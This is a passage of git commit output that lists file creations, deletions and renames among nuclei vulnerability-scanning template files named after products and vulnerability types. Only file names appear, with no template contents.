nuclei-templates/Other/readynas_surveillance.yaml delete mode 100644 nuclei-templates/Other/redash-detection.yaml create mode 100644 nuclei-templates/Other/redash-panel.yaml rename nuclei-templates/Other/{redcap-detector-9849.yaml => redcap-detector-9850.yaml} (100%) create mode 100644 nuclei-templates/Other/reflected-headers.yaml delete mode 100644 nuclei-templates/Other/reflected-params.yaml rename nuclei-templates/Other/{request-based-interaction-9862.yaml => request-based-interaction.yaml} (100%) delete mode 100644 nuclei-templates/Other/resin-cnnvd-200705-315-9865.yaml create mode 100644 nuclei-templates/Other/resin-cnnvd-200705-315-9867.yaml rename nuclei-templates/Other/{resin-viewfile-lfr-9874.yaml => resin-viewfile-lfr.yaml} (100%) delete mode 100644 nuclei-templates/Other/robomongo-credential-9884.yaml create mode 100644 nuclei-templates/Other/robomongo-credential-9885.yaml delete mode 100644 nuclei-templates/Other/robots-txt-9888.yaml create mode 100644 nuclei-templates/Other/robots-txt.yaml rename nuclei-templates/Other/{rocketmq-console-exposure-9894.yaml => rocketmq-console-exposure.yaml} (100%) delete mode 100644 nuclei-templates/Other/rockmongo-default-login-9897.yaml create mode 100644 nuclei-templates/Other/rockmongo-default-login-9899.yaml create mode 100644 nuclei-templates/Other/roundcube-log-disclosure-9905.yaml delete mode 100644 nuclei-templates/Other/roundcube-log-disclosure.yaml rename nuclei-templates/Other/{routeros-login.yaml => routeros-login-9909.yaml} (100%) rename nuclei-templates/Other/{rstudio-detect-9917.yaml => rstudio-detect-9919.yaml} (100%) delete mode 100644 nuclei-templates/Other/ruijie-EG-fileDown.yaml create mode 100644 nuclei-templates/Other/ruijie-eg-filedown.yaml rename nuclei-templates/Other/{ruijie-eg-password-leak-9922.yaml => ruijie-eg-password-leak.yaml} (100%) create mode 100644 nuclei-templates/Other/ruijie-information-disclosure-9931.yaml delete mode 100644 
nuclei-templates/Other/ruijie-information-disclosure-9932.yaml create mode 100644 nuclei-templates/Other/ruijie-networks-lfi-9938.yaml delete mode 100644 nuclei-templates/Other/ruijie-networks-lfi-9940.yaml create mode 100644 nuclei-templates/Other/ruijie-networks-rce-9943.yaml delete mode 100644 nuclei-templates/Other/ruijie-networks-rce-9949.yaml delete mode 100644 nuclei-templates/Other/ruijie-phpinfo-9951.yaml create mode 100644 nuclei-templates/Other/ruijie-phpinfo.yaml delete mode 100644 nuclei-templates/Other/rusty-joomla-9955.yaml create mode 100644 nuclei-templates/Other/rusty-joomla.yaml create mode 100644 nuclei-templates/Other/s3-subtakeover-9967.yaml delete mode 100644 nuclei-templates/Other/s3-subtakeover.yaml create mode 100644 nuclei-templates/Other/s3cmd-config-9961.yaml delete mode 100644 nuclei-templates/Other/s3cmd-config.yaml delete mode 100644 nuclei-templates/Other/saferoads-vms-login-9971.yaml create mode 100644 nuclei-templates/Other/saferoads-vms-login.yaml create mode 100644 nuclei-templates/Other/sage-detect-9975.yaml delete mode 100644 nuclei-templates/Other/sage-detect-9977.yaml create mode 100644 nuclei-templates/Other/salesforce-aura-9981.yaml delete mode 100644 nuclei-templates/Other/salesforce-aura.yaml delete mode 100644 nuclei-templates/Other/samba-config-9987.yaml create mode 100644 nuclei-templates/Other/samba-config.yaml delete mode 100644 nuclei-templates/Other/samba-detect-9988.yaml create mode 100644 nuclei-templates/Other/samba-detect.yaml delete mode 100644 nuclei-templates/Other/samsung-wlan-ap-default-credentials-9995.yaml create mode 100644 nuclei-templates/Other/samsung-wlan-ap-default-credentials.yaml create mode 100644 nuclei-templates/Other/samsung-wlan-ap-lfi-10003.yaml delete mode 100644 nuclei-templates/Other/samsung-wlan-ap-lfi-9999.yaml rename nuclei-templates/Other/{samsung-wlan-ap-rce-10004.yaml => samsung-wlan-ap-rce-10007.yaml} (100%) rename nuclei-templates/Other/{samsung-wlan-ap-xss.yaml => 
samsung-wlan-ap-xss-10012.yaml} (100%) delete mode 100644 nuclei-templates/Other/samsung-wlan-default-login-10018.yaml create mode 100644 nuclei-templates/Other/samsung-wlan-default-login.yaml delete mode 100644 nuclei-templates/Other/sangfor-ba-rce-10021.yaml create mode 100644 nuclei-templates/Other/sangfor-ba-rce.yaml create mode 100644 nuclei-templates/Other/sangfor-edr-rce-10028.yaml delete mode 100644 nuclei-templates/Other/sangfor-edr-rce-10030.yaml delete mode 100644 nuclei-templates/Other/sap-igs-detect-10040.yaml create mode 100644 nuclei-templates/Other/sap-igs-detect.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-detect-10047.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-detect.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-info-leak-10049.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-info-leak-10051.yaml rename nuclei-templates/Other/{sap-netweaver-portal-10055.yaml => sap-netweaver-portal.yaml} (100%) rename nuclei-templates/Other/{sap-netweaver-rce.yaml => sap-netweaver-rce(1).yaml} (100%) rename nuclei-templates/Other/{sap-netweaver-webgui-10058.yaml => sap-netweaver-webgui.yaml} (100%) create mode 100644 nuclei-templates/Other/sap-recon-detect-10062.yaml delete mode 100644 nuclei-templates/Other/sap-recon-detect-10063.yaml create mode 100644 nuclei-templates/Other/sap-redirect-10066.yaml delete mode 100644 nuclei-templates/Other/sap-redirect.yaml delete mode 100644 nuclei-templates/Other/sap-web-dispatcher-10078.yaml create mode 100644 nuclei-templates/Other/sap-web-dispatcher.yaml rename nuclei-templates/Other/{sapfiori-panel.yaml => sapfiori-panel-10033.yaml} (100%) create mode 100644 nuclei-templates/Other/sar2html-rce-10081.yaml delete mode 100644 nuclei-templates/Other/sar2html-rce.yaml delete mode 100644 nuclei-templates/Other/sassy-social-share-10086.yaml create mode 100644 nuclei-templates/Other/sassy-social-share-xss.yaml delete mode 100644 
nuclei-templates/Other/sauter-login-10089.yaml create mode 100644 nuclei-templates/Other/sauter-login.yaml rename nuclei-templates/Other/{sceditor-detect-10094.yaml => sceditor-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/seacms-rce-10100.yaml create mode 100644 nuclei-templates/Other/seacms-rce-10101.yaml rename nuclei-templates/Other/{searches (copy 1).yaml => searchbar.yaml} (100%) rename nuclei-templates/Other/{secmail-detect-10112.yaml => secmail-detect.yaml} (100%) rename nuclei-templates/Other/{secnet-ac-default-login.yaml => secnet-ac-default-login-10113.yaml} (100%) create mode 100644 nuclei-templates/Other/securenvoy-panel-10114.yaml delete mode 100644 nuclei-templates/Other/securenvoy-panel-10116.yaml rename nuclei-templates/Other/{securityspy-detect.yaml => securityspy-detect-10119.yaml} (100%) rename nuclei-templates/Other/{selea-ip-camera-10135.yaml => selea-ip-camera-10133.yaml} (100%) rename nuclei-templates/Other/{selenium-exposure-10137.yaml => selenium-exposure-10138.yaml} (100%) rename nuclei-templates/Other/{sendgrid-api-11859.yaml => sendgrid-api(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/sensitive-storage-exposure-10143.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-exposure.yaml delete mode 100644 nuclei-templates/Other/seowon-router-rce-10147.yaml create mode 100644 nuclei-templates/Other/seowon-router-rce-10148.yaml rename nuclei-templates/Other/{server-backup-login-10156.yaml => server-backup-login.yaml} (100%) create mode 100644 nuclei-templates/Other/server-backup-manager-se-10159.yaml delete mode 100644 nuclei-templates/Other/server-backup-manager-se-10160.yaml delete mode 100644 nuclei-templates/Other/server-status-localhost-10163.yaml create mode 100644 nuclei-templates/Other/server-status-localhost-10166.yaml create mode 100644 nuclei-templates/Other/servfail-refused-hosts-10169.yaml delete mode 100644 nuclei-templates/Other/servfail-refused-hosts-10170.yaml delete mode 100644 
nuclei-templates/Other/service-pwd-10176.yaml create mode 100644 nuclei-templates/Other/service-pwd.yaml delete mode 100644 nuclei-templates/Other/servicedesk-login-panel-10171.yaml create mode 100644 nuclei-templates/Other/servicedesk-login-panel-10173.yaml create mode 100644 nuclei-templates/Other/setup-page-exposure-10180.yaml delete mode 100644 nuclei-templates/Other/setup-page-exposure-10181.yaml create mode 100644 nuclei-templates/Other/shell-history-10192.yaml delete mode 100644 nuclei-templates/Other/shell-history.yaml rename nuclei-templates/Other/{Shipped100-sqli.yaml => shipped100-sqli.yaml} (100%) rename nuclei-templates/Other/{shopify-custom-token.yaml => shopify-custom-token-10198.yaml} (100%) create mode 100644 nuclei-templates/Other/shopify-shared-secret-11862.yaml delete mode 100644 nuclei-templates/Other/shopify-shared-secret.yaml rename nuclei-templates/Other/{shopify-token-10205.yaml => shopify-token.yaml} (100%) create mode 100644 nuclei-templates/Other/shoppable-token-10206.yaml delete mode 100644 nuclei-templates/Other/shoppable-token-10208.yaml create mode 100644 nuclei-templates/Other/shopware-detect-10213.yaml delete mode 100644 nuclei-templates/Other/shopware-detect.yaml rename nuclei-templates/Other/{shortcode-lfi.yaml => shortcode-lfi-10215.yaml} (100%) delete mode 100644 nuclei-templates/Other/shoutcast-server-10217.yaml create mode 100644 nuclei-templates/Other/shoutcast-server.yaml delete mode 100644 nuclei-templates/Other/showdoc-default-login-10219.yaml create mode 100644 nuclei-templates/Other/showdoc-default-login-10222.yaml create mode 100644 nuclei-templates/Other/showdoc-file-upload-rce-10225.yaml delete mode 100644 nuclei-templates/Other/showdoc-file-upload-rce-10229.yaml create mode 100644 nuclei-templates/Other/signatures-10251.yaml create mode 100644 nuclei-templates/Other/signatures-10263.yaml create mode 100644 nuclei-templates/Other/simple-employee-rce-10280.yaml delete mode 100644 
nuclei-templates/Other/simple-employee-rce.yaml delete mode 100644 nuclei-templates/Other/simple-image-manipulator-lfi-10281.yaml create mode 100644 nuclei-templates/Other/simple-image-manipulator-lfi.yaml delete mode 100644 nuclei-templates/Other/simplebooklet-takeover-10271.yaml create mode 100644 nuclei-templates/Other/simplebooklet-takeover.yaml delete mode 100644 nuclei-templates/Other/site-map-sql-injection.yaml create mode 100644 nuclei-templates/Other/sitecore-debug-page-10284.yaml delete mode 100644 nuclei-templates/Other/sitecore-debug-page.yaml create mode 100644 nuclei-templates/Other/sitecore-version-10292.yaml delete mode 100644 nuclei-templates/Other/sitecore-version.yaml create mode 100644 nuclei-templates/Other/sitefinity-login-10295.yaml delete mode 100644 nuclei-templates/Other/sitefinity-login-10298.yaml create mode 100644 nuclei-templates/Other/sitemap-sql-injection.yaml delete mode 100644 nuclei-templates/Other/siteomat-login-10303.yaml create mode 100644 nuclei-templates/Other/siteomat-login.yaml create mode 100644 nuclei-templates/Other/skycaiji-admin-panel-10304.yaml delete mode 100644 nuclei-templates/Other/skycaiji-admin-panel.yaml rename nuclei-templates/Other/{sl-studio-lfi-10319.yaml => sl-studio-lfi.yaml} (100%) create mode 100644 nuclei-templates/Other/slack-bot-token-10313.yaml delete mode 100644 nuclei-templates/Other/slack-bot-token.yaml delete mode 100644 nuclei-templates/Other/slack-webhook(1).yaml create mode 100644 nuclei-templates/Other/slack-webhook-11865.yaml delete mode 100644 nuclei-templates/Other/slack.yaml delete mode 100644 nuclei-templates/Other/slocum-login-10316.yaml create mode 100644 nuclei-templates/Other/slocum-login.yaml rename nuclei-templates/Other/{smartjob-takeover-10325.yaml => smartjob-takeover-10322.yaml} (100%) rename nuclei-templates/Other/{smartling-takeover-10326.yaml => smartling-takeover-10327.yaml} (100%) delete mode 100644 nuclei-templates/Other/smartstore-detect-10333.yaml create mode 100644 
nuclei-templates/Other/smartstore-detect-10334.yaml create mode 100644 nuclei-templates/Other/smb-v1-detection-10336.yaml delete mode 100644 nuclei-templates/Other/smb-v1-detection.yaml create mode 100644 nuclei-templates/Other/smugmug-takeover-10340.yaml delete mode 100644 nuclei-templates/Other/smugmug-takeover.yaml rename nuclei-templates/Other/{sniplets-xss-10344.yaml => sniplets-xss.yaml} (100%) delete mode 100644 nuclei-templates/Other/sofneta-mecdream-pacs-lfi-10350.yaml create mode 100644 nuclei-templates/Other/sofneta-mecdream-pacs-lfi.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-admin-1.yaml delete mode 100644 nuclei-templates/Other/solarwinds-default-admin-2.yaml delete mode 100644 nuclei-templates/Other/solarwinds-default-login-10355.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-login-10356.yaml create mode 100644 nuclei-templates/Other/solarwinds-servuftp-detect-10360.yaml delete mode 100644 nuclei-templates/Other/solarwinds-servuftp-detect.yaml create mode 100644 nuclei-templates/Other/solr-exposure-10363.yaml delete mode 100644 nuclei-templates/Other/solr-exposure-10364.yaml delete mode 100644 nuclei-templates/Other/solr-query-dashboard-10367.yaml create mode 100644 nuclei-templates/Other/solr-query-dashboard-10368.yaml delete mode 100644 nuclei-templates/Other/somfy-login-10371.yaml create mode 100644 nuclei-templates/Other/somfy-login.yaml rename nuclei-templates/Other/{sonarqube-login-10374.yaml => sonarqube-login-10376.yaml} (100%) create mode 100644 nuclei-templates/Other/sonarqube-token-10380.yaml delete mode 100644 nuclei-templates/Other/sonarqube-token-10382.yaml create mode 100644 nuclei-templates/Other/sonicwall-email-security-detect-10384.yaml delete mode 100644 nuclei-templates/Other/sonicwall-email-security-detect.yaml delete mode 100644 nuclei-templates/Other/sonicwall-management-panel-10387.yaml create mode 100644 nuclei-templates/Other/sonicwall-management-panel.yaml create mode 100644 
nuclei-templates/Other/sonicwall-sslvpn-shellshock-10391.yaml delete mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock-10393.yaml create mode 100644 nuclei-templates/Other/spectracom-default-login-10406.yaml delete mode 100644 nuclei-templates/Other/spectracom-default-login.yaml rename nuclei-templates/Other/{sphider-login.yaml => sphider-login-10410.yaml} (100%) delete mode 100644 nuclei-templates/Other/splunk-enterprise-login-panel.yaml create mode 100644 nuclei-templates/Other/splunk-enterprise-panel.yaml create mode 100644 nuclei-templates/Other/splunk-login-10416.yaml delete mode 100644 nuclei-templates/Other/splunk-login-10418.yaml rename nuclei-templates/Other/{sponip-network-system-ping-rce.yaml => sponip-network-system-ping-rce-10421.yaml} (100%) delete mode 100644 nuclei-templates/Other/spoofable-spf-records-ptr-10424.yaml create mode 100644 nuclei-templates/Other/spoofable-spf-records-ptr-10426.yaml delete mode 100644 nuclei-templates/Other/spring-framework-exceptions-10493.yaml create mode 100644 nuclei-templates/Other/spring-framework-exceptions.yaml delete mode 100644 nuclei-templates/Other/spring-functions-rce.yaml delete mode 100644 nuclei-templates/Other/spring_collection.yaml delete mode 100644 nuclei-templates/Other/springboot-actuator-10434.yaml create mode 100644 nuclei-templates/Other/springboot-actuator-10435.yaml delete mode 100644 nuclei-templates/Other/springboot-actuators-jolokia-xxe-10428.yaml create mode 100644 nuclei-templates/Other/springboot-actuators-jolokia-xxe-10429.yaml create mode 100644 nuclei-templates/Other/springboot-autoconfig-10437.yaml delete mode 100644 nuclei-templates/Other/springboot-autoconfig.yaml rename nuclei-templates/Other/{springboot-beans-10441.yaml => springboot-beans-10438.yaml} (100%) delete mode 100644 nuclei-templates/Other/springboot-env-10450.yaml create mode 100644 nuclei-templates/Other/springboot-env-10451.yaml delete mode 100644 nuclei-templates/Other/springboot-gateway-10453.yaml 
create mode 100644 nuclei-templates/Other/springboot-gateway.yaml delete mode 100644 nuclei-templates/Other/springboot-h2-db-rce-10454.yaml create mode 100644 nuclei-templates/Other/springboot-h2-db-rce-10455.yaml delete mode 100644 nuclei-templates/Other/springboot-health-10460.yaml create mode 100644 nuclei-templates/Other/springboot-health.yaml delete mode 100644 nuclei-templates/Other/springboot-heapdump-10465.yaml delete mode 100644 nuclei-templates/Other/springboot-info-10470.yaml create mode 100644 nuclei-templates/Other/springboot-info.yaml delete mode 100644 nuclei-templates/Other/springboot-log4j-rce-10472.yaml create mode 100644 nuclei-templates/Other/springboot-log4j-rce.yaml create mode 100644 nuclei-templates/Other/springboot-loggers-10475.yaml delete mode 100644 nuclei-templates/Other/springboot-loggers.yaml rename nuclei-templates/Other/{springboot-mappings-10478.yaml => springboot-mappings-10480.yaml} (100%) delete mode 100644 nuclei-templates/Other/springboot-threaddump-10486.yaml create mode 100644 nuclei-templates/Other/springboot-threaddump.yaml delete mode 100644 nuclei-templates/Other/springboot-trace-10488.yaml create mode 100644 nuclei-templates/Other/springboot-trace-10492.yaml delete mode 100644 nuclei-templates/Other/sql-dump-10496.yaml create mode 100644 nuclei-templates/Other/sql-dump.yaml create mode 100644 nuclei-templates/Other/sql-monitor-10505.yaml delete mode 100644 nuclei-templates/Other/sql-monitor.yaml rename nuclei-templates/Other/{sql-server-reporting-10510.yaml => sql-server-reporting-10508.yaml} (100%) rename nuclei-templates/Other/{sql-injection.yaml => sqli.yaml} (100%) rename nuclei-templates/Other/{sqli_header-10504.yaml => sqliheader.yaml} (100%) rename nuclei-templates/Other/{square-access-token(1).yaml => square-access-token-11867.yaml} (100%) create mode 100644 nuclei-templates/Other/square.yaml create mode 100644 nuclei-templates/Other/squid-analysis-report-generator-10512.yaml delete mode 100644 
nuclei-templates/Other/squid-analysis-report-generator-10513.yaml delete mode 100644 nuclei-templates/Other/squirrelmail-add-xss-10515.yaml create mode 100644 nuclei-templates/Other/squirrelmail-add-xss.yaml create mode 100644 nuclei-templates/Other/squirrelmail-lfi-10517.yaml delete mode 100644 nuclei-templates/Other/squirrelmail-lfi.yaml create mode 100644 nuclei-templates/Other/squirrelmail-vkeyboard-xss-10522.yaml delete mode 100644 nuclei-templates/Other/squirrelmail-vkeyboard-xss.yaml create mode 100644 nuclei-templates/Other/ssrf-via-oauth-misconfig-10526.yaml delete mode 100644 nuclei-templates/Other/ssrf-via-oauth-misconfig-10527.yaml rename nuclei-templates/Other/{ssrf-detection.yaml => ssrf_nagli.yaml} (100%) create mode 100644 nuclei-templates/Other/stackstorm-default-login-10529.yaml delete mode 100644 nuclei-templates/Other/stackstorm-default-login-10530.yaml delete mode 100644 nuclei-templates/Other/stem-audio-table-private-keys-10536.yaml create mode 100644 nuclei-templates/Other/stem-audio-table-private-keys.yaml create mode 100644 nuclei-templates/Other/strapi-documentation-10542.yaml delete mode 100644 nuclei-templates/Other/strapi-documentation-10543.yaml create mode 100644 nuclei-templates/Other/strapi-page-10545.yaml delete mode 100644 nuclei-templates/Other/strapi-page.yaml rename nuclei-templates/Other/{stripe-api-key(1).yaml => stripe-api-key-11869.yaml} (100%) delete mode 100644 nuclei-templates/Other/stripe-restricted-key-10555.yaml create mode 100644 nuclei-templates/Other/stripe-restricted-key.yaml rename nuclei-templates/Other/{stripe-secret-key-10558.yaml => stripe-secret-key.yaml} (100%) rename nuclei-templates/Other/{api-stripe.yaml => stripe.yaml} (100%) create mode 100644 nuclei-templates/Other/struts-debug-mode-10560.yaml delete mode 100644 nuclei-templates/Other/struts-debug-mode-10561.yaml create mode 100644 nuclei-templates/Other/struts-problem-report-10563.yaml delete mode 100644 
nuclei-templates/Other/struts-problem-report.yaml create mode 100644 nuclei-templates/Other/sugarcrm-panel-10569.yaml delete mode 100644 nuclei-templates/Other/sugarcrm-panel-10571.yaml delete mode 100644 nuclei-templates/Other/supermicro-default-login-10572.yaml create mode 100644 nuclei-templates/Other/supermicro-default-login.yaml create mode 100644 nuclei-templates/Other/superset-default-login-10574.yaml delete mode 100644 nuclei-templates/Other/superset-default-login.yaml delete mode 100644 nuclei-templates/Other/supervpn-panel-10575.yaml create mode 100644 nuclei-templates/Other/supervpn-panel-10577.yaml create mode 100644 nuclei-templates/Other/suspicious-sql-error-messages-10585.yaml delete mode 100644 nuclei-templates/Other/suspicious-sql-error-messages-10586.yaml rename nuclei-templates/Other/{swagger-api-10595.yaml => swagger-api-10592.yaml} (100%) create mode 100644 nuclei-templates/Other/swagger-ui-bypass.yaml create mode 100644 nuclei-templates/Other/symantec-dlp-login-10596.yaml delete mode 100644 nuclei-templates/Other/symantec-dlp-login.yaml create mode 100644 nuclei-templates/Other/symantec-epm-login-10602.yaml delete mode 100644 nuclei-templates/Other/symantec-epm-login.yaml delete mode 100644 nuclei-templates/Other/symantec-ewep-login-10605.yaml create mode 100644 nuclei-templates/Other/symantec-ewep-login.yaml delete mode 100644 nuclei-templates/Other/symantec-messaging-gateway-10607.yaml create mode 100644 nuclei-templates/Other/symantec-pgp-global-directory-10611.yaml delete mode 100644 nuclei-templates/Other/symantec-pgp-global-directory-10613.yaml delete mode 100644 nuclei-templates/Other/symfony-database-config-10616.yaml create mode 100644 nuclei-templates/Other/symfony-database-config-10617.yaml delete mode 100644 nuclei-templates/Other/symfony-debugmode-10618.yaml create mode 100644 nuclei-templates/Other/symfony-debugmode-10623.yaml create mode 100644 nuclei-templates/Other/symfony-profiler-10625.yaml delete mode 100644 
nuclei-templates/Other/symfony-profiler-10626.yaml delete mode 100644 nuclei-templates/Other/synology-web-station-10631.yaml create mode 100644 nuclei-templates/Other/synology-web-station-10632.yaml create mode 100644 nuclei-templates/Other/sysaid-help-desk.yaml rename nuclei-templates/Other/{szhe-default-login.yaml => szhe-default-login-10638.yaml} (100%) delete mode 100644 nuclei-templates/Other/tableau-panel-10642.yaml create mode 100644 nuclei-templates/Other/tableau-panel.yaml create mode 100644 "nuclei-templates/Other/tamronos iptv\347\263\273\347\273\237.yaml" rename nuclei-templates/Other/{tamronos-rce-10649.yaml => tamronos-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/targa-camera-ssrf-10657.yaml create mode 100644 nuclei-templates/Other/targa-camera-ssrf.yaml delete mode 100644 nuclei-templates/Other/tcpconfig-10663.yaml create mode 100644 nuclei-templates/Other/tcpconfig-10665.yaml delete mode 100644 nuclei-templates/Other/teamcity-registration-enabled-10667.yaml create mode 100644 nuclei-templates/Other/teamcity-registration-enabled.yaml create mode 100644 nuclei-templates/Other/teamwork-takeover-10669.yaml delete mode 100644 nuclei-templates/Other/teamwork-takeover-10671.yaml delete mode 100644 nuclei-templates/Other/tech-detect-10672.yaml create mode 100644 nuclei-templates/Other/tech-detect-10673.yaml delete mode 100644 nuclei-templates/Other/tectuus-scada-monitor-10682.yaml create mode 100644 nuclei-templates/Other/tectuus-scada-monitor.yaml delete mode 100644 nuclei-templates/Other/tekon-info-leak-10685.yaml create mode 100644 nuclei-templates/Other/tekon-info-leak.yaml delete mode 100644 nuclei-templates/Other/telerik-fileupload-detect-10692.yaml create mode 100644 nuclei-templates/Other/telerik-fileupload-detect-10694.yaml rename nuclei-templates/Other/{Tenda-leakage.yaml => tenda-leakage.yaml} (100%) rename nuclei-templates/Other/{teradici-pcoip-10702.yaml => teradici-pcoip.yaml} (100%) create mode 100644 
nuclei-templates/Other/terraform-detect-10709.yaml delete mode 100644 nuclei-templates/Other/terraform-detect.yaml create mode 100644 nuclei-templates/Other/terraform-enterprise-panel-10712.yaml delete mode 100644 nuclei-templates/Other/terraform-enterprise-panel.yaml create mode 100644 nuclei-templates/Other/the-next.yaml rename nuclei-templates/Other/{thinkcmf_include.yaml => thinkCMF_include.yaml} (100%) delete mode 100644 nuclei-templates/Other/thinkcmf-detect.yaml create mode 100644 nuclei-templates/Other/thinkcmf-detection-10719.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-lfi (copy 1).yaml create mode 100644 nuclei-templates/Other/thinkcmf-rce-10725.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-rce-10729.yaml create mode 100644 nuclei-templates/Other/thinkcmf-workflow-10730.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-workflow.yaml delete mode 100644 nuclei-templates/Other/thinkific-redirect-10736.yaml create mode 100644 nuclei-templates/Other/thinkific-redirect-10737.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5022-rce-10746.yaml create mode 100644 nuclei-templates/Other/thinkphp-5022-rce-10747.yaml create mode 100644 nuclei-templates/Other/thinkphp-5023-rce-10749.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5023-rce-10751.yaml delete mode 100644 nuclei-templates/Other/thinkphp-509-information-disclosure-10752.yaml create mode 100644 nuclei-templates/Other/thinkphp-509-information-disclosure-10753.yaml create mode 100644 nuclei-templates/Other/threatq-login-10757.yaml delete mode 100644 nuclei-templates/Other/threatq-login.yaml create mode 100644 nuclei-templates/Other/thumbs-db-disclosure-10761.yaml delete mode 100644 nuclei-templates/Other/thumbs-db-disclosure-10762.yaml create mode 100644 nuclei-templates/Other/tianqing-info-leak-10765.yaml delete mode 100644 nuclei-templates/Other/tianqing-info-leak.yaml rename nuclei-templates/Other/{tictail-takeover-10769.yaml => tictail-takeover-10768.yaml} 
(100%) rename nuclei-templates/Other/{tidb-unauth-10772.yaml => tidb-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/tikiwiki-cms-10774.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-cms-10775.yaml create mode 100644 nuclei-templates/Other/tikiwiki-reflected-xss-10777.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-reflected-xss-10779.yaml create mode 100644 nuclei-templates/Other/tilda-takeover-10781.yaml delete mode 100644 nuclei-templates/Other/tilda-takeover-10782.yaml rename nuclei-templates/Other/{tileserver-gl-10786.yaml => tileserver-gl-10787.yaml} (100%) delete mode 100644 nuclei-templates/Other/time-based-sqli.yaml create mode 100644 nuclei-templates/Other/tin-canny-learndash-reporting.yaml rename nuclei-templates/Other/{api-tinypng.yaml => tinypng.yaml} (100%) rename nuclei-templates/Other/{titannit-web-rce.yaml => titannit-web-ssrf.yaml} (100%) delete mode 100644 nuclei-templates/Other/tomcat-default-login-10788.yaml create mode 100644 nuclei-templates/Other/tomcat-default-login-10789.yaml rename nuclei-templates/Other/{tomcat-detect.yaml => tomcat-detect-10794.yaml} (100%) create mode 100644 nuclei-templates/Other/tomcat-pathnormalization-10799.yaml delete mode 100644 nuclei-templates/Other/tomcat-pathnormalization-10800.yaml rename nuclei-templates/Other/{tomcat-scripts-10801.yaml => tomcat-scripts.yaml} (100%) rename nuclei-templates/Other/{tomcat-workflow-10805.yaml => tomcat-workflow.yaml} (100%) create mode 100644 nuclei-templates/Other/top-xss-params-10809.yaml delete mode 100644 nuclei-templates/Other/top-xss-params.yaml create mode 100644 nuclei-templates/Other/tos.yaml rename nuclei-templates/Other/{trace-axd-detect-10825.yaml => trace-axd-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/trace-method-10827.yaml create mode 100644 nuclei-templates/Other/trace-method-10829.yaml rename nuclei-templates/Other/{travis-ci-disclosure.yaml => travis-config.yaml} (100%) rename 
nuclei-templates/Other/{trilithic-viewpoint-login.yaml => trilithic-viewpoint-login-10839.yaml} (100%) rename nuclei-templates/Other/{tugboat-config-exposure.yaml => tugboat-config-exposure-10843.yaml} (100%) rename nuclei-templates/Other/{tumblr-takeover-10845.yaml => tumblr-takeover.yaml} (100%) create mode 100644 nuclei-templates/Other/turbocrm-xss-10848.yaml delete mode 100644 nuclei-templates/Other/turbocrm-xss-10850.yaml delete mode 100644 nuclei-templates/Other/twig-php-ssti-10856.yaml create mode 100644 nuclei-templates/Other/twig-php-ssti-10859.yaml delete mode 100644 nuclei-templates/Other/twilio-api-10861.yaml create mode 100644 nuclei-templates/Other/twilio-api.yaml create mode 100644 nuclei-templates/Other/twitter-secret-11870.yaml delete mode 100644 nuclei-templates/Other/twitter-secret.yaml create mode 100644 nuclei-templates/Other/twitter.yaml delete mode 100644 nuclei-templates/Other/txt-fingerprint-10863.yaml create mode 100644 nuclei-templates/Other/txt-fingerprint.yaml create mode 100644 nuclei-templates/Other/uberflip-takeover-10864.yaml delete mode 100644 nuclei-templates/Other/uberflip-takeover-10866.yaml rename nuclei-templates/Other/{ucmdb-default-login-10869.yaml => ucmdb-default-login-10868.yaml} (100%) create mode 100644 nuclei-templates/Other/ultimatemember-open-redirect-10877.yaml delete mode 100644 nuclei-templates/Other/ultimatemember-open-redirect.yaml delete mode 100644 nuclei-templates/Other/umbraco-base-ssrf-10882.yaml create mode 100644 nuclei-templates/Other/umbraco-base-ssrf.yaml delete mode 100644 nuclei-templates/Other/umbraco.yaml rename nuclei-templates/Other/{unauth-ftp.yaml => unauth-ftp-10942.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauth-hoteldruid-panel-10943.yaml create mode 100644 nuclei-templates/Other/unauth-hoteldruid-panel.yaml delete mode 100644 nuclei-templates/Other/unauth-message-read-10945.yaml create mode 100644 nuclei-templates/Other/unauth-message-read-10946.yaml create mode 100644 
nuclei-templates/Other/unauth-rlm-10960.yaml delete mode 100644 nuclei-templates/Other/unauth-rlm.yaml delete mode 100644 nuclei-templates/Other/unauth-spark-api-10961.yaml create mode 100644 nuclei-templates/Other/unauth-spark-api-10963.yaml create mode 100644 nuclei-templates/Other/unauth-wavink-panel-10967.yaml delete mode 100644 nuclei-templates/Other/unauth-wavink-panel.yaml create mode 100644 nuclei-templates/Other/unauth-xproxy-dashboard-10968.yaml delete mode 100644 nuclei-templates/Other/unauth-xproxy-dashboard.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-alert-manager-10888.yaml create mode 100644 nuclei-templates/Other/unauthenticated-alert-manager.yaml create mode 100644 nuclei-templates/Other/unauthenticated-frp-10896.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-frp-10897.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-glances-10898.yaml create mode 100644 nuclei-templates/Other/unauthenticated-glances.yaml create mode 100644 nuclei-templates/Other/unauthenticated-glowroot-10900.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-glowroot-10902.yaml create mode 100644 nuclei-templates/Other/unauthenticated-influxdb-10903.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-influxdb.yaml rename nuclei-templates/Other/{unauthenticated-lansweeper-10904.yaml => unauthenticated-lansweeper-10906.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauthenticated-mongo-express-10908.yaml create mode 100644 nuclei-templates/Other/unauthenticated-mongo-express-10909.yaml create mode 100644 nuclei-templates/Other/unauthenticated-nacos-access-10912.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-nacos-access.yaml 